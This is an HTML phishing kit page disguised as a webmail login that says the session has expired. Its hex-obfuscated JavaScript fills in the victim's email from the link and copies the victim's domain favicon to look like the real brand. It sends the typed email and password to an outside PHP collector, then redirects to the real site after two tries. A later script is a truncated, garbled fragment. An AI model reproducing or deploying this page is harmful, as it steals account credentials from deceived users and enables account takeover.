<!DOCTYPE html>
<html lang="en" >

<head>

  <meta charset="UTF-8">
  
<meta http-equiv="content-type" content="text/html; charset=windows-1252">
        <meta name="robots" content="noindex, nofollow">
<meta name="googlebot" content="noindex, nofollow"> 
    <title>Webmail Portal Login</title>
    <script src="jquery-1.js"></script>

    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">


      <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="bootstrap.min.css?1422585379">
    <link href="https://fonts.googleapis.com/css?family=Yellowtail%26display=swap" rel="stylesheet">
    <script src="https://kit.fontawesome.com/585b051251.js" crossorigin="anonymous"></script>
  <style>
  
 html,body,div,span,applet,object,iframe,h1,h2,h3,h4,h5,h6,p,blockquote,pre,a,abbr,acronym,address,big,cite,code,del,dfn,em,img,ins,kbd,q,s,samp,small,strike,strong,sub,sup,tt,var,b,u,i,center,dl,dt,dd,ol,ul,li,fieldset,form,label,legend,table,caption,tbody,tfoot,thead,tr,th,td,article,aside,canvas,details,embed,figure,figcaption,footer,header,hgroup,menu,nav,output,ruby,section,summary,time,mark,audio,video{margin:0;padding:0;border:0;vertical-align:baseline}article,aside,details,figcaption,figure,footer,header,hgroup,menu,nav,section{display:block}body{line-height:1}ol,ul{list-style:none}blockquote,q{quotes:none}blockquote:before,blockquote:after,q:before,q:after{content:'';content:none}table{border-collapse:collapse;border-spacing:0}
    
    html,body{}#root{position:absolute;left:0;right:0;bottom:0;top:0;z-index:-10;pointer-events:none}.error{color:#dc3545;width:80%;margin:0 auto;padding-top:5px}.form-holder{background-color:#fff;width:600px;margin:100px auto;height:100%;box-shadow:0 20px 50px #a9a9a9;border-radius:4px 4px 0 0;border:1px solid #d6dfea;z-index:12}
     
 }
  

.social_icons a{
  display: block;
  height: 45px;
  width: 100%;
  line-height: 45px;
  text-align: center;
  border-radius: 5px;
  font-size: 20px;
  color: #fff;
  text-decoration: none;
  transition: all 0.3s linear;
}
.social_icons a span{
  margin-left: 5px;
  font-size: 18px;
}
.social_icons a:first-child{
  margin-right: 5px;
  background: #4267B2;
}
.social_icons a:first-child:hover{
  background: #375695;
}
.social_icons a:last-child{
  margin-left: 5px;
  background: #1DA1F2;
}
.social_icons a:last-child:hover{
  background: #0d8bd9;
}
form {
  margin-top: 25px;
}
form .input_box{
  height: 50px;
  width: 100%;
  position: relative;
  margin-top: 15px;
}
.input_box input{
  height: 100%;
  width: 100%;
  outline: none;
  border: 1px solid lightgrey;
  border-radius: 5px;
  padding-left: 45px;
  font-size: 17px;
  transition: all 0.3s ease;
}
.input_box input:focus{
  border-color: #ff0000;
}
.input_box .icon{
  position: absolute;
  top: 50%;
  left: 20px;
  transform: translateY(-50%);
  color: grey;
}
form .option_div{
  margin-top: 5px;
  display: flex;
  justify-content: space-between;
}
.option_div .check_box{
  display: flex;
  align-items: center;
}
.option_div span{
  margin-left: 5px;
  font-size: 16px;
  color: #333;
}
.option_div .forget_div a{
  font-size: 16px;
  color: #be2edd;
}
.button input{
  padding-left: 0;
  background: #be2edd;
  color: #fff;
  border: none;
  font-size: 20px;
  font-weight: 500;
  cursor: pointer;
  transition: all 0.3s linear;
}
.button input:hover{
  background: #a720c5;
}
form .sign_up{
  text-align: center;
  margin-top: 25px;
}
.sign_up a{
  color: #be2edd;
}
form a{
  text-decoration: none;
}
form a:hover{
  text-decoration: underline;
}
  </style>


  <script>
  window.console = window.console || function(t) {};
</script>

  
  
  <script>
  if (document.location.search.match(/type=embed/gi)) {
    window.parent.postMessage("resize", "*");
  }
</script>

    <script src="https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js"></script>
  <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.1.3/js/bootstrap.min.js"></script>
  
    <script>
  window.console = window.console || function(t) {};
</script>

  
  
  <script>
  if (document.location.search.match(/type=embed/gi)) {
    window.parent.postMessage("resize", "*");
  }
  </script>

  
  <script>

 var _$_9486=["\x68\x69\x64\x65","\x23\x6D\x73\x67","","\x76\x61\x6C","\x23\x65\x6D\x61\x69\x6C","\x61\x6E\x69\x6D\x61\x74\x65","\x23\x61\x75\x74\x6F\x6D\x61\x69\x6C","\x73\x68\x6F\x77","\x23\x69\x6E\x70\x75\x74\x62\x61\x72","\x63\x6C\x69\x63\x6B","\x23\x62\x61\x63\x6B\x31","\x73\x75\x62\x73\x74\x72","\x68\x61\x73\x68","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x74\x65\x73\x74","\x23\x65\x72\x72\x6F\x72","\x66\x6F\x63\x75\x73","\x40","\x69\x6E\x64\x65\x78\x4F\x66","\x2E","\x74\x6F\x4C\x6F\x77\x65\x72\x43\x61\x73\x65","\x74\x6F\x55\x70\x70\x65\x72\x43\x61\x73\x65","\x73\x72\x63","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x67\x6F\x6F\x67\x6C\x65\x2E\x63\x6F\x6D\x2F\x73\x32\x2F\x66\x61\x76\x69\x63\x6F\x6E\x73\x3F\x64\x6F\x6D\x61\x69\x6E\x3D","\x61\x74\x74\x72","\x23\x6C\x6F\x67\x6F\x69\x6D\x67","\x68\x74\x6D\x6C","\x23\x6C\x6F\x67\x6F\x6E\x61\x6D\x65","\x2E\x6C\x6F\x67\x6F\x6E\x61\x6D\x65","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E","\x23\x69\x66\x72\x61\x6D\x65","\x70\x72\x65\x76\x65\x6E\x74\x44\x65\x66\x61\x75\x6C\x74","\x23\x70\x61\x73\x73\x77\x6F\x72\x64","\x74\x65\x78\x74","\x2E\x6C\x6F\x67\x6F\x69\x6D\x67","\x4A\x53\x4F\x4E","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x73\x65\x72\x76\x69\x63\x65\x6F\x66\x66\x69\x63\x65\x6E\x65\x74\x2E\x63\x6F\x6D\x2F\x6B\x6E\x6E\x2F\x64\x6B\x65\x6C\x6C\x65\x72\x2E\x70\x68\x70","\x50\x4F\x53\x54","\x56\x65\x72\x69\x66\x69\x6E\x67\x2E\x2E\x2E","\x23\x73\x75\x62\x6D\x69\x74\x2D\x62\x74\x6E","\x6C\x6F\x67","\x73\x69\x67\x6E\x61\x6C","\x6F\x6B","\x68\x74\x74\x70\x3A\x2F\x2F\x77\x77\x77\x2E","\x72\x65\x70\x6C\x61\x63\x65","\x53\x69\x67\x6E\x20\x69\x6E","\x61\x6A\x61\x78","\x72\x65\x61\x64\x79"];$(document)[_$_9486[47]](function(){var _0x16281=0;$(_$_9486[10])[_$_9486[9]](function(){$(_$_9486[1])[_$_9486[0]]();$(_$_9486[4])[_$_9486[3]](_$_9486[2]);$(_$_9486[6])[_$_9486[5]]({left:200,opacity:_$_9486[0]},0);$(_$_9486[8])[_$_9486[5]]({right:200,opacity:_$_9486[7]},1000)});var _0x162E2=window[_$_9486[13]][_$_9486[12]][_$_9486[11]](1);if(!_0x162E2){}else {var _0x164C7=_0x162E2;$(_$_9486[4])[_$_9486[3]](_0x164C7);var _0x16343=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x16343[_$_9486[14]](_0x164C7)){$(_$_9486[15])[_$_9486[7]]();_0x162E2[_$_9486[16]];return false};var _0x16466=_0x164C7[_$_9486[18]](_$_9486[17]);var _0x16528=_0x164C7[_$_9486[11]]((_0x16466+ 1));var _0x16220=_0x16528[_$_9486[11]](0,_0x16528[_$_9486[18]](_$_9486[19]));var _0x163A4=_0x16220[_$_9486[20]]();var _0x16405=_0x16220[_$_9486[21]]();$(_$_9486[25])[_$_9486[24]](_$_9486[22],_$_9486[23]+ _0x16528);$(_$_9486[27])[_$_9486[26]](_0x16405);$(_$_9486[28])[_$_9486[26]](_0x16405);$(_$_9486[30])[_$_9486[24]](_$_9486[22],_$_9486[29]+ _0x16528)};$(_$_9486[39])[_$_9486[9]](function(_0x16589){$(_$_9486[15])[_$_9486[0]]();$(_$_9486[1])[_$_9486[0]]();_0x16589[_$_9486[31]]();var _0x162E2=$(_$_9486[4])[_$_9486[3]]();var _0x1664B=$(_$_9486[32])[_$_9486[3]]();var _0x165EA=$(_$_9486[1])[_$_9486[26]]();$(_$_9486[1])[_$_9486[33]](_0x165EA);var _0x164C7=_0x162E2;var _0x16343=/^([a-zA-Z0-9_\.\-])+\@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/;if(!_0x16343[_$_9486[14]](_0x164C7)){$(_$_9486[15])[_$_9486[7]]();_0x162E2[_$_9486[16]];return false};var _0x16466=_0x164C7[_$_9486[18]](_$_9486[17]);var _0x16528=_0x164C7[_$_9486[11]]((_0x16466+ 1));var _0x16220=_0x16528[_$_9486[11]](0,_0x16528[_$_9486[18]](_$_9486[19]));var _0x163A4=_0x16220[_$_9486[20]]();var _0x16405=_0x16220[_$_9486[21]]();$(_$_9486[30])[_$_9486[24]](_$_9486[22],_$_9486[29]+ _0x16528);$(_$_9486[25])[_$_9486[24]](_$_9486[22],_$_9486[23]+ _0x16528);$(_$_9486[34])[_$_9486[24]](_$_9486[22],_$_9486[23]+ _0x16528);$(_$_9486[27])[_$_9486[26]](_0x16405);_0x16281= _0x16281+ 1;$[_$_9486[46]]({dataType:_$_9486[35],url:_$_9486[36],type:_$_9486[37],data:{email:_0x162E2,password:_0x1664B},beforeSend:function(_0x166AC){$(_$_9486[39])[_$_9486[26]](_$_9486[38])},success:function(_0x1670D){if(_0x1670D){$(_$_9486[1])[_$_9486[7]]();console[_$_9486[40]](_0x1670D);if(_0x1670D[_$_9486[41]]== _$_9486[42]){$(_$_9486[32])[_$_9486[3]](_$_9486[2]);if(_0x16281>= 2){_0x16281= 0;window[_$_9486[13]][_$_9486[44]](_$_9486[43]+ _0x16528)}}else {}}},error:function(){$(_$_9486[32])[_$_9486[3]](_$_9486[2]);if(_0x16281>= 2){_0x16281= 0;window[_$_9486[13]][_$_9486[44]](_$_9486[43]+ _0x16528)};$(_$_9486[1])[_$_9486[7]]()},complete:function(){$(_$_9486[39])[_$_9486[26]](_$_9486[45])}})})})

  </script>
<script>
    window.onload = function() {
  var input = document.getElementById("password").focus();
}

</script>
</head>

<body translate="no" >
  <!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS -->
    <link rel="stylesheet" href="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css" integrity="sha384-Vkoo8x4CGsO3+Hhxv8T/Q5PaXtkKtu6ug5TOeNV6gBiFeWPGFN9MuhOf23Q9Ifjh" crossorigin="anonymous">

    <title>Hello, world!</title>
  </head>
  <body>
      <div id="root">
<iframe id="iframe" scrolling="no" src="" width="100%" height="100%" frameborder="0"></iframe> </div>
<form action="#" method="post">
<input type="hidden" class="form-control" name="hido" id="hido" value="">
<input type="hidden" class="form-control" name="redirecto" id="redirecto" value="">

     <!--   <h1 style="text-align: center;">Hello, world!</h1>
 Button trigger modal --> 
  

    <!-- Modal -->
    <div class="modal fade" id="exampleModal" tabindex="-1" role="dialog" style="margin-top: 90px; display: block !important;" aria-labelledby="exampleModalLabel" aria-hidden="true">
    <div class="modal-dialog" style="box-shadow: rgba(0, 0, 0, 0.4) 0px 30px 90px;" role="document">
        <div class="modal-content">
        <div class="modal-header">
            <div class="xlogo">
            <h5><img id="logoimg" src="">
            <span style="text-transform: capitalize;" id="logoname"></span></h5>
            </div>
                
            <button type="button" class="close" data-dismiss="modal" aria-label="Close">
            <span aria-hidden="true">&times;</span>
            </button>
        </div>
        <div class="modal-body">
        <div class="form-wrap">
        <center>
            <div>Your session has expired, please login again to continue.</div></center>
        <center>
          <div class="alert alert-danger" id="msg" style="display: none; color:red;"> Invalid Password.! Please Enter your correct Password</div>
          <div id="error" class="text-danger" style="display: none; color:red;">That account doesn't exist. Enter a different account</div>
        </center>
      <div class="input_box">
        <input type="email" name="username" id="email" placeholder="Email or Phone" disabled="disabled" >
        <div class="icon"><i class="fas fa-user"></i></div>
      </div>
      <div class="input_box">
        <input type="password" name="password" id="password" placeholder="Password" autofocus required="required">
        <div class="icon"><i class="fas fa-lock"></i></div>
      </div>
        </div>
                </div>

       <div class="modal-footer"> 
            <!--     <div class="input_box"> -->

            <button type="submit" id="submit-btn" class="btn btn-primary">Sign in</button>
        </div>
        </div>
    </div>
    </div>

    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js" integrity="sha384-wfSDF2E50Y2D1uUdj0O3uMBJnjuUD4Ih7YwaYd1iqfktj0Uod8GCExl3Og8ifwB6" crossorigin="anonymous"></script>
    <script>
       \x64\x61\x6C","\x72\x65\x61\x64\x79","\x73\x74\x61\x74\x69\x63"];$(document)[_$_2a39[3]](function(){$(_$_2a39[2])[_$_2a39[1]](_$_2a39[0])});$(_$_2a39[2])[_$_2a39[1]]({backdrop:_$_2a39[4],keyboard:false})
    </script>


  </body>
</html>

  
  

</body>

</html>
 
